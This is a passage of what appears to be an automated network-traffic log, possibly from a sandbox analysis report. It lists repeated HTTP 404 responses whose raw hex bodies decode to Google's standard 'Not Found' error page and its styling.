69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:56 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:24:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 02 Sep 2024 12:25:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 